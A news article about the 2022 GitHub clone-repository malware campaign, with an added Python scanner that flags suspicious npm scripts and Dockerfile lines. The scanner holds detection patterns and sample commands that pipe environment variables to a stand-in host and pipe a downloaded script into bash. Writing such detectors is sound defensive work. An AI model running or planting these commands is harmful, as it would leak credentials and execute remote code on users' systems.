Popular Developer Platform GitHub Faces Strong Malware Attacks with 35,000 Code Hits

By Bhushan Akolkar · 2 min read

GitHub developer James Tucker pointed out that the clone repositories containing the malicious URL exfiltrated a user’s environment variables and also contained a one-line backdoor.

On Wednesday, August 3, the popular developer platform GitHub faced a major, widespread malware attack with more than 35,000 “code hits” in a single day. Interestingly, this happened on the same day that more than 8,000 Solana wallets were compromised.

GitHub developer Stephen Lacy reported the widespread attack himself, having come across the issue while reviewing a project. Lacy wrote:

“I am uncovering what seems to be a massive widespread malware attack on @github. – Currently over “code hits” on github. So far found in projects including: crypto, golang, python, js, bash, docker, k8s. It is added to npm scripts, docker images and install docs.”

The recent attack on GitHub affected a multitude of projects, including crypto, Golang, Python, JavaScript, Bash, Docker and Kubernetes. The malicious code was specifically placed in install docs, npm scripts and Docker images, which are convenient places to bundle the common shell commands a project needs.

The Nature of the Malware Attack on Github

To reach sensitive data while evading developers’ notice, the attacker first creates a fake repository and then pushes clones of legitimate projects to GitHub. According to the investigation, the attacker also submitted several of these clone repositories as “pull requests”.

Another GitHub developer, James Tucker, pointed out that the clone repositories containing the malicious URL exfiltrated a user’s environment variables and also contained a one-line backdoor. Exfiltrating an environment can hand threat actors vital secrets, including Amazon AWS credentials, API keys, tokens and crypto keys.

The one-line backdoor, meanwhile, allows remote attackers to execute arbitrary code on the systems of everyone who runs the script. According to BleepingComputer, reports differed on the timeline of the activity.
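The two behaviours described above, environment exfiltration and a one-line download-and-execute backdoor, both live in places such as npm lifecycle scripts and Dockerfile RUN lines. The following is an added defender-side example, not code from the article or from the affected projects: it scans those two locations with heuristic patterns (assumed for the illustration, not signatures from the incident) and labels matching commands. The sample package.json and Dockerfile are constructed.

```python
from __future__ import annotations
import json
import re

# Heuristic patterns (assumptions for this illustration, not signatures from
# the incident): a command that reads environment variables and hands them to
# a network client, and a one-line "download and run a remote script" backdoor.
ENV_DUMP = re.compile(r"\b(env|printenv)\b|\bAWS_[A-Z_]+\b|\b[A-Z_]*_(TOKEN|SECRET|KEY)\b")
NETWORK_CLIENT = re.compile(r"\b(curl|wget|nc|ncat)\b")
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b")


def classify_command(cmd: str) -> list[str]:
    """Return the labels of suspicious behaviours found in one shell command."""
    findings = []
    if REMOTE_EXEC.search(cmd):
        findings.append("remote-script-execution")
    if ENV_DUMP.search(cmd) and NETWORK_CLIENT.search(cmd):
        findings.append("env-exfiltration")
    return findings


def scan_package_json(text: str) -> dict[str, list[str]]:
    """Map each suspicious npm script name (build, postinstall, ...) to its findings."""
    scripts = json.loads(text).get("scripts", {})
    return {name: f for name, cmd in scripts.items() if (f := classify_command(cmd))}


def scan_dockerfile(text: str) -> dict[int, list[str]]:
    """Map each suspicious RUN line (1-based line number) to its findings."""
    out = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.upper().startswith("RUN ") and (f := classify_command(line[4:])):
            out[lineno] = f
    return out


# Constructed sample inputs; the hostnames use the reserved .invalid TLD.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-app",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "env | curl -s --data-binary @- http://collector.invalid/c"
  }
}"""
SAMPLE_DOCKERFILE = """FROM node:18
RUN apt-get update && apt-get install -y git
RUN curl -fsSL http://mirror.invalid/setup.sh | bash
CMD ["node", "index.js"]
"""
```

Run `scan_package_json` over every package.json and `scan_dockerfile` over every Dockerfile in a pull request before merging; a non-empty result is a prompt for manual review, not proof of compromise.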

The attackers had altered a large majority of the repositories with malicious code over the previous month. GitHub removed some of the malicious code from its platform a few hours ago. In an update on Wednesday, GitHub noted:

“GitHub is investigating the Tweet published Wed, Aug. 3, 2022: * No repositories were compromised. * Malicious code was posted to cloned repositories, not the repositories themselves. * The clones were quarantined and there was no evident compromise of GitHub or maintainer accounts.”
